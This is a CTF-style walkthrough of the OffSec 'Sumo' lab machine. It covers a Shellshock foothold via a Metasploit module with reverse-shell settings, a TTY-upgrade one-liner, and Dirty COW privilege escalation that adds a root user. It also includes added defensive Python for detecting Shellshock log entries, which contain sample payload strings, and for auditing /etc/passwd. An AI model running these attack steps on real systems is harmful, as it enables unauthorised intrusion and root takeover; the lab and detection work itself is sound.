OffSec — Sumo Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
Let’s start things off with a network scan to see which ports are open and the services running on each.
$ nmap -A -O -sC -sV -p- <machine_IP>
Scanning for directories with Gobuster:
Gobuster didn’t turn up any other directories, I found no other hosts or subdomains, and a second scan showed no additional open ports.
I decided to use the tool Nikto to see if that could find anything.
$ nikto -h <machine_IP>
Very interesting: that scan found a potential attack vector in a CGI script that looks vulnerable to the Shellshock bash bug.
Initial foothold:
This time I’ll use Metasploit framework and try to get my foothold with that.
The module of choice is:
exploit(multi/http/apache_mod_cgi_bash_env_exec)
There are a few options to set once that module is selected:
RHOSTS - <machine_IP>
TARGETURI - hxxp://<machine_IP>/cgi-bin/test
LHOST - <attack_IP>
LPORT - <PORT_of_choice>
NOTE: make sure there is no other listener on the attack machine using the same port as LPORT. Also, don’t pick the same port as the SRVPORT option.
Got initial access!
I’ll be taking that flag now.
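The foothold above works because a vulnerable bash parses function definitions out of environment variables, and Apache's CGI handler copies request headers (User-Agent, Referer, ...) straight into the environment of /cgi-bin/ scripts. On the defensive side, that makes Shellshock attempts easy to spot in the web server's access log. The following is an added example, not code from the original post: a small Python detector that parses Apache "combined" log lines and flags the `() {` function-definition prefix in the User-Agent or Referer field. The log lines, IPs and paths are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache "combined" log format (not real traffic).
# Lines 2 and 3 carry the bash function-definition prefix that Shellshock
# attempts rely on, once in User-Agent and once in Referer.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Feb/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Feb/2024:10:00:07 +0000] "GET /cgi-bin/test HTTP/1.1" 200 74 "-" "() { :; }; echo probe"
10.0.0.9 - - [01/Feb/2024:10:00:09 +0000] "GET /cgi-bin/test HTTP/1.1" 200 74 "() { x; }; echo probe" "curl/7.68.0"
10.0.0.7 - - [01/Feb/2024:10:00:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 90 "-" "Mozilla/5.0 (X11; Linux)"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock payload begins with an empty bash function definition: "() {".
# Tolerate whitespace variations; a legitimate User-Agent such as
# "Mozilla/5.0 (X11; Linux)" does not match because the parentheses are not empty.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format log line, or None if it doesn't parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per log line whose User-Agent or Referer carries a
    bash function definition. 'cgi' marks requests that hit a CGI path, which is
    where the injected environment variable would actually reach bash."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "path": rec["path"],
                    "field": field,
                    "cgi": rec["path"].startswith("/cgi-bin/"),
                })
                break  # one finding per request is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} via {hit['field']} (cgi={hit['cgi']})")
```

Two caveats for real deployments: the access log only records headers Apache chose to log, so headers other than User-Agent and Referer need a custom LogFormat or a web application firewall in front of the server to be seen at all, and the real fix is the patched bash package rather than the signature (the patched bash only imports functions from variables named `BASH_FUNC_name%%`, so header contents are never parsed as code).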
In order to get a standard shell and be able to navigate better and use more commands, I’ll run the shell command from the meterpreter prompt:
# initiates a standard shell from meterpreter
meterpreter > shell
# check which python is installed, so I can use it to get a stable shell
$ which python
# one-liner to spawn a proper TTY and make the shell stable
$ python -c 'import pty; pty.spawn("/bin/bash")'
Exploit:
I checked a few ways to escalate privileges, such as cronjobs, binaries/executables with the SUID bit set, hidden folders, and the SSH directory, and lastly I checked the version of the Linux kernel running on the machine.
I checked with searchsploit for exploits on that kernel version.
The results show that the machine is potentially vulnerable to CVE-2016-5195, the “Dirty COW” kernel exploit. Info found here.
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system."
Here’s a snippet of the exploit-db[.]com code showing how to run it.
I had to download the script to my machine, use Python to start a simple HTTP server, then fetch it from the target machine and follow the directions to execute it.
NOTE: Whenever I am downloading anything to a machine that I’ve compromised, I’ll be in a directory that the compromised user can write to. (usually /tmp or /opt)
Privilege Escalation:
The script creates a new user with root privileges, and now I can switch to that user.
Time to get that root flag!
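The escalation above leaves an artifact a defender can look for: a second UID 0 account in /etc/passwd, typically with its password hash written directly into the passwd entry instead of /etc/shadow. The following is an added example, not code from the original post or from the exploit: a Python audit that parses passwd-format lines and flags both indicators. The sample entries, including the account named `newroot` and its placeholder hash, are constructed for the example.

```python
from typing import Dict, List

# Constructed /etc/passwd excerpt (not from a real system). The last line is
# the kind of entry a Dirty COW privilege-escalation script leaves behind:
# a second UID 0 account with a hash in the password field. The hash value
# is a placeholder, not a real crypt(3) hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
webadmin:x:1000:1000:webadmin,,,:/home/webadmin:/bin/bash
newroot:$6$placeholderhash:0:0:pwned:/root:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "no valid password"; anything else
# in the second field is a hash that login(1) will happily use.
SHADOWED_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Parse passwd-format text into one dict per account (7 colon-separated fields)."""
    entries: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(parts)}")
        name, pw, uid, gid, gecos, home, shell = parts
        entries.append({
            "name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
            "gecos": gecos, "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return human-readable findings for accounts that should not exist on a
    healthy host: extra UID 0 users and entries that carry a password hash in
    /etc/passwd rather than /etc/shadow."""
    findings: List[str] = []
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"extra UID 0 account: {e['name']}")
        if e["pw"] not in SHADOWED_MARKERS and e["pw"] != "":
            findings.append(
                f"password hash stored in /etc/passwd rather than /etc/shadow: {e['name']}"
            )
        elif e["pw"] == "":
            findings.append(f"empty password field (no password required): {e['name']}")
    return findings


if __name__ == "__main__":
    # On a live host this would read /etc/passwd; here it runs on the constructed sample.
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Checking the kernel version string alone is a weak indicator for this CVE, because distributions backport the fix without bumping the upstream version number, so auditing for the artifacts the escalation leaves (new UID 0 entries, a changed mtime on /etc/passwd, backup copies of passwd in /tmp) complements patch verification rather than replacing it.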
Reporting:
- Keep all software and hardware patched and up to date with the latest security releases to prevent vulnerabilities.
Note from Publication: This story was uploaded at the permission of user “xocybersec” on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower
© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.